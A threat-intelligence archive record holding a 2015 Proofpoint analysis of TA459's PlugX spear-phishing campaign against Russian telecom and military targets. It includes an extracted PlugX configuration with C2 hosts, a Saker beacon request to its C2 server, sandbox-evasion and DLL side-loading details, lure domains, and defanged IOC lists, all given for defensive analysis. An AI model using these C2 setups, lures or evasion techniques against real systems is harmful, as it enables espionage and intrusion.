{
	"id": "8971a112-c136-4ca2-9b95-8fbf28dc4b69",
	"created_at": "2026-04-06T00:09:21.451961Z",
	"updated_at": "2026-04-10T13:12:04.44326Z",
	"deleted_at": null,
	"sha1_hash": "0a0c97b21075f4588f10503ae1c26a4685e061d1",
	"title": "Targeted Attack Distributes PlugX in Russia | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 358510,
	"plain_text": "Targeted Attack Distributes PlugX in Russia | Proofpoint US\r\nBy Thoufique Haq \u0026 Aleksey F, September 15, 2015\r\nPublished: 2015-09-15 · Archived: 2026-04-05 18:25:25 UTC\r\nProofpoint researchers recently observed a campaign targeting the telecom and military sectors in Russia. Beginning in July 2015 (and possibly earlier), the attack continued into August and is currently ongoing. As a part of this campaign, we also observed attacks on Russian-speaking financial analysts working at global financial firms and covering telecom corporations in Russia, likely collateral damage resulting from the attackers' targeting tactics.\r\nThe attacks employed PlugX malware, a Remote Access Trojan (RAT) widely used in targeted attacks. Proofpoint is tracking this attacker, believed to operate out of China, as TA459. This same attacker is also reported to have targeted various military installations in Central Asia in the past [1]. While the current campaign from this attacker has been active for a couple of months, there is evidence of activity by this attacker as far back as 2013, employing other backdoors such as Saker, Netbot and DarkStRat.\r\nThe attacks seen in the current campaign involved spear-phishing emails that employ both exploit-laden Microsoft Word document attachments and links leading to RAR archives. The email contents, filenames and decoys are all usually in Russian.\r\nPlugX Malware Analysis\r\n1. PlugX Campaign Details: Attachments\r\nThe Microsoft Word document attachments observed in this campaign utilized CVE-2012-0158 to exploit the client and implant the PlugX RAT. For example, the attachment LTE-2600.doc (SHA: 6ea86b944c8b5a9b02adc7aac80e0f33217b28103b70153710c1f6da76e36081) was sent to financial analysts covering the telecom industry with the email Subject “Проект бизнес-плана” (“Project business-plan”). 
The attachment name is suited to the targets because “LTE” is a telecom term referring to Long-Term Evolution networks, typically used to describe 4G networks.\r\nInspection of the document exploit employing CVE-2012-0158 also revealed that it was crafted using a builder tool, as can be seen in various artifacts visible in the document properties (Fig. 1). However, it should be noted that we do not believe that this builder is exclusively used by this attacker; it is likely shared among multiple threat actor groups.\r\nhttps://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia\r\nPage 1 of 13\n\nFigure 1: Builder artifacts in exploit document\r\n2. Campaign Details: URLs\r\nAs a part of this PlugX campaign, the attackers also sent spear-phishing emails with URLs to RAR archive files hosted on fake domains registered for this campaign. An interesting fact that sheds some light on the social engineering tradecraft used by the group is that these domain names as well as payload file names were not chosen at random, as is often the case, but were instead chosen to fit the specific lure.\r\nFor example, the RAR archive hosted on www.forum-mil[.]net/news/2015-08-03-3001.rar contained the executable file “Воздушно-космические силы России заступили на боевое дежурство.exe” (“Aerospace Russian forces step up military duty.exe”). 
Additional searching uncovered a news article with this title on a legitimate Russian-language news site, http://www.forum-mil.ru/news/vozdushno_kosmicheskie_sily_rossii_zastupili_na_boevoe_dezhurstvo/2015-08-03-3001: the malicious executable borrowed its name from the article title, and the site hosting the malware mimics the site that hosts the news article.\r\nIn another example, the news article http://tvzvezda.ru/news/forces/content/201508191459-88tq.htm was used as the basis for registering the payload hosting site www[.]tvzvezda[.]net/news/forces/content/201508181025.rar. Again, the title of the article was used as the name for the executable inside the RAR archive, and it appears that many of these lures were created in a similar fashion. Specifically, the actor starts with an article describing a military-related event and then registers a payload site and names the malware file accordingly. Table 1 shows the full list of payload domains and the sites they mimic. (A list of the payload URLs can be found in the Indicators of Compromise section at the end of this post.)\r\nInfection Site | Registrant Email | Legitimate Site Mimicked\r\narms-expo[.]net | gengd@gmail.com | arms-expo[.]ru (Russian information agency on weapons)\r\nforum-mil[.]net | gengd@gmail.com | forum-mil[.]ru (Forum of the Ministry of Defense of the Russian Federation)\r\ntvzvezda[.]net | hsdf@gmail.com | tvzvezda.ru (TV network run by the Russian Ministry of Defense)\r\nrusarmy[.]net | dolphin@yahoo.com | rusarmy[.]com (Russian army and its weapons forum)\r\npatriotp[.]com | dolphin@yahoo.com | patriotp[.]ru (Russian military patriot recreation park)\r\nmilitarynewes[.]com | gjklsdf@gmail.com | militarynews[.]com (US military news portal)\r\nTable 1: Details on domains hosting malicious RAR-archived PlugX executables\r\nAll the infection domains and command 
and control (C2) domains were registered using the same registrar in Beijing: “Shanghai Meicheng Technology Information Development Co., Ltd.”. Other than the emails, the information used for registration was randomized.\r\nThe RAR archives hosted on fake domains contained RAR SFX (self-extracting executable) packaged executables which drop and load PlugX. Proofpoint researchers observed the following filenames being used for executables in the campaign:\r\nEmbedded Filename | Translated\r\nСМИ -расчет рассылки новый.scr | Mass Media - Calculation of new distribution.scr\r\nВ России сформирована легендарная 6-я Ленинградская армия ВВС и ПВО.scr | In Russia, a legendary 6th Leningrad army VVS and PVO is formed.scr\r\nСамая мощная ядерная бомба в истории.scr | Strongest nuclear bomb in history.scr\r\nПамятные мероприятия, в связи с 15-летием гибели АПРК «Курск».exe | Commemorative events in connection with the 15th anniversary of the sinking of nuclear submarine “Kursk”.exe\r\nСМИ.scr | Mass Media.scr\r\nВоздушно-космические силы России заступили на боевое дежурство.exe | Aerospace Russian forces step up military duty.exe\r\n11.08.2015.scr | N/A\r\nTable 2: Filenames of executables inside RAR archives\r\n2.1. Decoy Content and Sandbox Evasion\r\nInterestingly, one of the RAR SFX droppers (SHA: 71be8bb45dfe360ee6076ed34fde12a382fe9d7922bd11b179ca773be12fa54c) launches a decoy Microsoft Word document before launching the executable. 
(Fig. 2) The contents of this decoy document reference the “Tsar Bomba” nuclear test from the Cold War era and have been directly lifted from a Russian site.\r\nFigure 2: Contents of decoy document referencing “Tsar Bomba”\r\nIn addition to displaying something potentially relevant to the recipient’s interests, the RAR SFX does not execute the PlugX payload until the victim closes the decoy Word document, a behaviour seen in the past as a sandbox evasion technique. As a result, the actual payload may never execute in malware sandbox environments unless the sandbox is configured to simulate the action of a user closing the decoy document. The SFX script for this document (Fig. 3) appears to have been created with a Chinese language pack version of WinRAR. The decoy document “1.doc” is executed first, and the script waits until it is closed before launching “0810.exe”. This effect can be easily achieved in WinRAR by setting the “Wait and return exit code” option when creating the SFX archive.\r\nFigure 3: RAR SFX script\r\n3. PlugX Implant\r\nThe attachment and email campaigns both employed DLL side-loading techniques to load the PlugX payload. All of the payloads used the same clean signed executable “fsguidll.exe”, masquerading as the F-Secure GUI component, to sideload “fslapi.dll”, which in turn unpacks code from “fslapi.dll.gui”.\r\nFigure 4: DLL sideloading masquerading as the F-Secure GUI component\r\nThe variant of PlugX used is the P2P version that was described by JPCERT [2]. 
A sample configuration extracted using the volatility script from Arbor [3] is shown below.\r\nPlugX Config (0x36a4 bytes):\r\n Hide Dll: -1\r\n Keylogger: -1\r\n Sleep1: 167772160\r\n Sleep2: 0\r\n Cnc: www.pressmil[.]com:80 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:80 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:80 (UDP)\r\n Cnc: www.pressmil[.]com:443 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:443 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:443 (UDP)\r\n Cnc: www.pressmil[.]com:53 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:53 (UDP)\r\n Cnc: www.pressmil[.]com:53 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:995 (HTTP / UDP)\r\n Cnc: www.pressmil[.]com:995 (TCP / HTTP)\r\n Cnc: www.pressmil[.]com:995 (UDP)\r\n Persistence: Service + Run Key\r\n Install Folder: %AUTO%\\ucP\r\n Service Name: sWtDmsuBTyMK\r\n Service Display Name: sWtDmsuBTyMK\r\n Service Desc: Windows sWtDmsuBTyMK Service\r\n Reg Hive: HKCU\r\n Reg Key: Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n Reg Value: gGIHBgytn\r\n Injection: 1\r\n Inject Process: %ProgramFiles(x86)%\\Windows Media Player\\wmplayer.exe\r\n Inject Process: %windir%\\system32\\winlogon.exe\r\n Inject Process: %windir%\\explorer.exe\r\n Inject Process: %windir%\\system32\\svchost.exe\r\n Uac Bypass Injection: 1\r\n Uac Bypass Inject: %windir%\\system32\\msiexec.exe\r\n Uac Bypass Inject: %windir%\\system32\\rundll32.exe\r\n Uac Bypass Inject: %windir%\\explorer.exe\r\n Uac Bypass Inject: %windir%\\system32\\dllhost.exe\r\n Plugx Auth Str: TEST\r\n Cnc Auth Str: LLL-0808\r\n Mutex: Global\\IUNJCCvywXlrisLlcBhqGm\r\n Screenshots: 0\r\n Screenshots Sec: 10\r\n Screenshots Zoom: 50\r\n Screenshots Bits: 16\r\n Screenshots Qual: 50\r\n Screenshots Keep: 3\r\n Screenshot Folder: %AUTO%\\FS\\screen\r\n Enable Tcp P2P: 1\r\n Tcp P2P Port: 1357\r\n Enable Udp P2P: 1\r\n Udp 
P2P Port: 1357\r\n Enable Icmp P2P: 1\r\n Icmp P2P Port: 1357\r\n Enable Ipproto P2P: 1\r\n Ipproto P2P Port: 1357\r\n Enable P2P Scan: 1\r\n P2P Start Scan1: 0.0.0.0\r\n P2P Start Scan2: 0.0.0.0\r\n P2P Start Scan3: 0.0.0.0\r\n P2P Start Scan4: 0.0.0.0\r\n P2P End Scan1: 0.0.0.0\r\n P2P End Scan2: 0.0.0.0\r\n P2P End Scan3: 0.0.0.0\r\n P2P End Scan4: 0.0.0.0\r\n Mac Disable: 00:00:00:00:00:00\r\nMany of the samples used the string “EEEEEE” for authentication of the C2 communication, which is likely the default value. Other observed values include “LLL-0808”, “0abcde”, and “niii-0701”.\r\n4. Command and Control Infrastructure\r\nWe observed pressmil[.]com and notebookhk[.]net being used as the C2 servers for this specific campaign. Over the duration of the campaign both of these domains pointed to the same infrastructure on the IP address “43.252.175.119” in Hong Kong. This IP infrastructure has been actively used by this attacker as early as 2014-12-04. Other domains also registered to point to this same IP address include “fedpress[.]net” and “dicemention[.]com”, which have been observed in use in past campaigns.\r\nIn addition, the C2 server notebookhk[.]net pointed to 123.254.104.50 multiple times between 2013-08-23 and 2014-09-29. Similarly, dicemention[.]com pointed to this IP multiple times between 2013-12-05 and 2014-09-28. Multiple domains used this same IP infrastructure 123.254.104.50 in the past, such as:\r\nbusiness-isa.mynetav[.]org\r\nbusiness-rsa.onmypc[.]org\r\nblacktan[.]cn\r\ndicemention[.]com\r\nleeghost[.]com\r\nnotebookhk[.]net\r\nWhen investigating 123.254.104.50 we discovered additional, older payloads clustering into three different malware families. 
These additional malware families used by this attacker in the past were Saker, Netbot and DarkStRat. Researchers at ESET also reported and documented the usage of DarkStRat by this attacker [1].\r\n4.1. Related Malware: Saker (aka XBox) implant\r\nThe samples from the Saker cluster exhibited clues that also point to targeting of the Russian military. For example, the file “zamysel praticteskih dejstvi voisk.scr” (SHA: 556e7e944939929ca4d9ca6c54d9059edf97642ece1d84363f2d46e2e8ca72ae) translates to “plan of army practice maneuvers.scr”. It was similarly packaged in a RAR archive, and on execution it drops and loads a DLL file “icwnet.dll” (SHA: 1a789568a53c18dab21c9c0386c746878cf8458e3369f0dc36a285fe296f3be3) which contains the exports “ServiceMain” and “JustTempFun”. The malware makes the following beacon to a remote server:\r\nGET /30106C07000038FE0F00\u003cremoved\u003e0000000000000000000000000000000000000000000000000000000000000000000\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: www.leeghost.com:1037\r\nCache-Control: no-cache\r\nThis backdoor has been analyzed extensively in the past [4] and provides the attacker a range of functionality, including a file manager (enumerate, create, copy, move, delete); the ability to download and run secondary payloads; and deleting all traces of itself and shutting down.\r\n4.2. Related Malware: Netbot (aka TornRat) Implant\r\nWhen an example payload (SHA: 277fe4dab731149f3d40630f2f8b25092b007c701f04b5304d3ba9570280d015) from this cluster is detonated, it drops and loads a DLL file “taskhost.dll” (SHA: dd9d31c3acb4299619c2251698024da1ac9ec42280aa6c16cd2369907f3be4e3). The malware sends an initial beacon to its C2 server (Fig. 
5), which matches the TornRAT network signature previously published by CrowdStrike [5].\r\nFigure 5: Netbot network beacon\r\nThe scheme used to encrypt the beacon is a byte-wise XOR with 0x3f followed by an addition of 0x3f. The encrypted beacon contains the hostname, system memory, OS information and infection timestamp (Fig. 6).\r\nFigure 6: Netbot network beacon decoded\r\nSamples from this cluster were found creating the following mutexes:\r\nWinlogin Running!\r\nNetbot2012 Is Running!\r\nNetBotServer Is Running!\r\nIt is worth noting that there is similarity in the mutex naming scheme to another malware family called NetTraveler (aka Travnet). Netbot is a backdoor and has commands supporting features similar to those noted above for Saker, such as a file manager (enumerate, create, copy, move, delete); the ability to download and execute secondary payloads; and deleting all traces of itself.\r\n4.3. Related Malware: DarkStRat implant\r\nWhen an example payload (SHA: b38aa09a2334e11a73ef9a926694f2054789934daa38afeb8d00bce6949b6c4c) from this cluster is detonated it drops and runs an executable file “netlink.exe” (SHA: b38aa09a2334e11a73ef9a926694f2054789934daa38afeb8d00bce6949b6c4c). The RAT sends the string \"ok\\n\" following the initial beacon to a remote server. A configuration file “netsetting.ini” is also written to disk with the following contents:\r\n[Option]\r\nHostPort=443\r\nHostName=www.dicemention.com\r\nDarkStRat is a full-fledged RAT written in Delphi with an array of features such as a file manager, process manager, registry manager, service manager, downloading and running secondary payloads and deleting all traces of itself. As also noted by the ESET researchers [1], the strings in this RAT strangely show Spanish language origins, albeit with some Chinese connections. 
The source code for this RAT is hosted on Google Code with the name “DarkStRat 2008 1.0开源.rar”. The string “开源” in the name translates to “Open Source”. Various parts of the source code also have strings in Chinese and reference “darkst[.]com” and “fsg2[.]cn”. The owner of this Google-hosted code project is listed as darkteam...@gmail.com. As a result, it can be inferred that code from a Spanish RAT was repurposed by a malware author with Chinese origins and marketed as DarkStRat, but as is often the case we should caution against a definitive attribution based solely on characteristics such as language and C2 server locations.\r\n5. PlugX Malware Campaign Conclusion\r\nA detailed examination of this operation reveals an adversary who demonstrates a keen interest in the Russian telecom and military sectors, indicative of an actor with geopolitical motives. The attacker adapts and evolves their Tactics, Techniques and Procedures (TTPs) over time as the situation demands. While the attacker appears to do very little to hide their tracks, they remain highly determined and persistent and have carried out attacks through a sustained operation spanning at least two years, and possibly longer. The attacker also invests time to research the locale and current events relevant to their targets and then leverages this in their targeting tactics. Attacks such as these have become a constant occurrence given the covert nature of digital attacks and easy access to targeting information online.\r\nAs this threat shows, attackers continue to employ increasingly sophisticated techniques against new targets in order to uncover and steal sensitive information. Organizations need to recognize that they cannot rely on traditional antivirus and anti-spam solutions to detect and stop these advanced threats. 
In order to combat targeted attacks, organizations should adopt next-generation solutions that make it possible to identify and respond to sophisticated targeted attacks by correlating advanced detection with threat intelligence about actor TTPs and global views of threat traffic, including IOCs that enable response teams to quickly detect and mitigate compromises. Moreover, a multi-layer approach is essential, with email security representing the logical starting point for an advanced threat defense: as in this targeted attack, email remains the vector of choice for penetrating target organizations and delivering these sophisticated payloads.\r\nIndicators of Compromise (IOCs)\r\nPlugX Infection URLs:\r\n[hxxp://www.arms-expo[.]net/news/content/387206.rar]\r\n[hxxp://arms-expo[.]net/news/content/day_2015-08-20.rar]\r\n[hxxp://arms-expo[.]net/news/samaia_mochnaia_iagernaia_bomba_v_istorii.rar]\r\n[hxxp://www.arms-expo[.]net/news/content/20150818.rar]\r\n[hxxp://www.tvzvezda[.]net/news/forces/content/201508181025.rar]\r\n[hxxp://www.arms-expo[.]net/news/content/20150818.zip]\r\n[hxxp://www.arms-expo[.]net/news/content/Day_2015-08-20.rar]\r\n[hxxp://www.arms-expo[.]net/news/content/VTC.rar]\r\n[hxxp://www.rusarmy[.]net/forum/vvs/modernizirovanoj.rar]\r\n[hxxp://www.rusarmy[.]net/forum/threads/sostojanie-krejserov-proekta-1144.9.rar]\r\n[hxxp://www.forum-mil[.]net/news/2015-08-03-3001.rar]\r\n[hxxp://www.militarynewes[.]com/news/11.08.2015.rar]\r\nPlugX hashes 
(SHA256):\r\n1aa6c5d0c9ad914fb5ed24741ac947d31cac6921ece7b3b807736febda7e2c4b\r\n1b32825f178afe76e290c458ddbf8a3596002c6f9a7763687311f7d211a54aab\r\n3e824972397b322ea9f48fd1a9a02bd6c3eb68cc7de3a4f29e46a5c67b625ec1\r\n49e1f953dc17073bf919972868576b93cc9f3b5b9600f98a0bd9e39e5d229d9e\r\n4cadbdb5a09781555cc5d637d3fecf89b9a66fac245d6a3a14989f39a9a48c6e\r\n67cccfa23a7fd1d9ca8160cd977d536c4a40bf9525a93aa4122a89527a96fa8f\r\n6ea86b944c8b5a9b02adc7aac80e0f33217b28103b70153710c1f6da76e36081\r\n7efcf2211cd68ab459582594b5d75c64830acf25bcaab065bbd60377fb9eb22a\r\n8702506e8e75834a8f011cfc268d02043af5522aeda20a8458880c8fbed7ecac\r\n8a5df5f31a3b4f893a0565967d64e57f41d91e3592bbd8d52f98f81b3fb8452b\r\nSaker hashes (SHA256):\r\n556e7e944939929ca4d9ca6c54d9059edf97642ece1d84363f2d46e2e8ca72ae\r\n0d2600d978f5c1042e93b701654db080aac144dfa2877844334b1d4cd78f4a1d\r\n2a6dee57cb302a1350ade4a33f40a77c1952cf2e6b29d1be8400c13927e34670\r\n383c5d22c1de3aae7684eb5a7d87d6b553f09f166ca402894c5deecabaa7d866\r\n53d29782b8c325c2ff62493cdb261a8e54e45ed04880527e75e8e211b4d8d861\r\n5d97ec30c481e00d4285246b528745f331be905f453e062bd9c2d506e9386f0e\r\n664f80b427bf0145e62f6f90cb4833c30cfb8dc4b2d68746aa01420da82bd8af\r\n6dc560a3b20a6e95552254bdb04fba03f74223a83a58436a3decfab74abc5fb5\r\na2f4aa2d25bff21e73b15065e2fc38d297ee14253044a66d00690b1bb23fc373\r\nc7d7211d1fea69ea6a9697a8f8d21ac40f6d7dc6863708b9a98930271a156c86\r\nd2a5cf434e8a0c63c23e6a3e5cf8a60f259099a706d2d243ffa5c7dbd46fd9d4\r\nd6ff406da6e9a20074c3e1228ab04d35a3839b1719d3cafbb21ad3e3b6d03ef4\r\ndf4571b7d3be63de8338e6905b2689309ed5cce88d57a8db0c7b9aebf713d81c\r\ned7771339794c7908865f7816513b593369a93c98b39f58ebaaa98f3f0067e9d\r\nNetbot hashes 
(SHA256):\r\n4524ede160d5476211e99329768b38abd88aacb6fa9334f2c2bbcaab9b0438f5\r\n317e9deef23ff0e919083ac6c94b5ccd3bb0227f674078d66cdd4a2e5d1ebba9\r\n68a98b8e174cb5af20e0ac97978bad6d245a1cb0970b82a4a269a92e7726d74b\r\n277fe4dab731149f3d40630f2f8b25092b007c701f04b5304d3ba9570280d015\r\nf95c6749f4d4fae18f9d384f495dc1c79e7484b309d0d35ea68966763ed325bd\r\nDarkStRat hashes (SHA256):\r\nb38aa09a2334e11a73ef9a926694f2054789934daa38afeb8d00bce6949b6c4c\r\n0d219aa54b1d417da61bd4aed5eeb53d6cba91b3287d53186b21fed450248215\r\nC2 domains observed:\r\npressmil[.]com\r\nnotebookhk[.]net\r\ndicemention[.]com\r\nleeghost[.]com\r\nReferences:\r\n[1] http://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/\r\n[2] http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html\r\n[3] https://github.com/arbor-jjones/volatility_plugins\r\n[4] http://blog.crowdstrike.com/whois-anchor-panda/\r\nSource: https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia"
	],
	"report_names": [
		"PlugX-in-Russia"
	],
	"threat_actors": [
		{
			"id": "7041fcf5-b34d-47c3-be4c-3c40f243af89",
			"created_at": "2023-01-06T13:46:38.611261Z",
			"updated_at": "2026-04-10T02:00:03.038745Z",
			"deleted_at": null,
			"main_name": "TA459",
			"aliases": [
				"G0062"
			],
			"source_name": "MISPGALAXY:TA459",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "808d8d52-ca06-4a5f-a2c1-e7b1ce986680",
			"created_at": "2022-10-25T16:07:23.899157Z",
			"updated_at": "2026-04-10T02:00:04.782542Z",
			"deleted_at": null,
			"main_name": "NetTraveler",
			"aliases": [
				"APT 21",
				"Hammer Panda",
				"NetTraveler",
				"TEMP.Zhenbao"
			],
			"source_name": "ETDA:NetTraveler",
			"tools": [
				"Agent.dhwf",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"NetTraveler",
				"Netfile",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TravNet",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0bf35542-9ebc-44a9-b319-b6df0bee4bac",
			"created_at": "2022-10-25T15:50:23.437853Z",
			"updated_at": "2026-04-10T02:00:05.36762Z",
			"deleted_at": null,
			"main_name": "TA459",
			"aliases": [
				"TA459"
			],
			"source_name": "MITRE:TA459",
			"tools": [
				"gh0st RAT",
				"NetTraveler",
				"PlugX",
				"ZeroT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "802552ac-1f16-4b85-8d78-76d683684124",
			"created_at": "2022-10-25T16:07:24.28032Z",
			"updated_at": "2026-04-10T02:00:04.920517Z",
			"deleted_at": null,
			"main_name": "TA459",
			"aliases": [
				"G0062"
			],
			"source_name": "ETDA:TA459",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"NetTraveler",
				"Netfile",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TravNet",
				"Xamtrav",
				"ZeroT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c6604303-a1c8-4e59-ba12-5da5c0bc6877",
			"created_at": "2023-01-06T13:46:38.312359Z",
			"updated_at": "2026-04-10T02:00:02.923025Z",
			"deleted_at": null,
			"main_name": "APT14",
			"aliases": [
				"ANCHOR PANDA",
				"QAZTeam"
			],
			"source_name": "MISPGALAXY:APT14",
			"tools": [
				"Backdoor.Win32.PoisonIvy",
				"Gen:Trojan.Heur.PT",
				"Torn RAT",
				"Anchor Panda",
				"Gh0st Rat",
				"Gh0stRat, GhostRat",
				"Poison Ivy"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "25a38dea-d23b-479b-9548-024e955b8964",
			"created_at": "2022-10-25T16:07:23.305911Z",
			"updated_at": "2026-04-10T02:00:04.533448Z",
			"deleted_at": null,
			"main_name": "Anchor Panda",
			"aliases": [
				"APT 14",
				"Anchor Panda",
				"QAZTeam"
			],
			"source_name": "ETDA:Anchor Panda",
			"tools": [
				"AngryRebel",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Torn RAT",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "254f2fab-5834-4d90-9205-d80e63d6d867",
			"created_at": "2023-01-06T13:46:38.31544Z",
			"updated_at": "2026-04-10T02:00:02.924166Z",
			"deleted_at": null,
			"main_name": "APT21",
			"aliases": [
				"HAMMER PANDA",
				"TEMP.Zhenbao",
				"NetTraveler"
			],
			"source_name": "MISPGALAXY:APT21",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434161,
	"ts_updated_at": 1775826724,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0a0c97b21075f4588f10503ae1c26a4685e061d1.pdf",
		"text": "https://archive.orkl.eu/0a0c97b21075f4588f10503ae1c26a4685e061d1.txt",
		"img": "https://archive.orkl.eu/0a0c97b21075f4588f10503ae1c26a4685e061d1.jpg"
	}
}